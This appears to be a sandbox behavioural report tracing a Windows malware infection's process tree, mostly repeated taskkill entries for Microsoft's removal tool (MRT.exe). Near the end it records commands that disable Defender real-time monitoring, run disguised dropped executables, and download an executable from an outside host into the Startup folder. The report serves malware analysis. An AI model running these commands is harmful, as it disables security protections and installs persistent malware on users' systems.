        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5276
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5696
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5960
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5864
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1656
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4420
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:60
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5480
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:2160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5424
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5244
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:556
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2856
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5372
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3856
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:720
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2728
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5696
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:720
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:6140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Prem.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4936
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:1612
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe"
        9⤵
        Executes dropped EXE
        
        PID:4420
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command " Set-MpPreference -DisableRealtimeMonitoring $true ""
        11⤵
        
        PID:5220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Comms\Ram.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Ram.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Rostic.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:60
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\Melan.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\mdkd.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://envs.sh/E3L.exe', 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe')"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6020
        
        C:\Windows\system32\wscript.exe
        
        "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\9A95.tmp\9A96.tmp\9A97.vbs //Nologo
        10⤵
        Checks computer location settings
        
        PID:6104
        
        C:\Windows\system32\cmd.exe
        
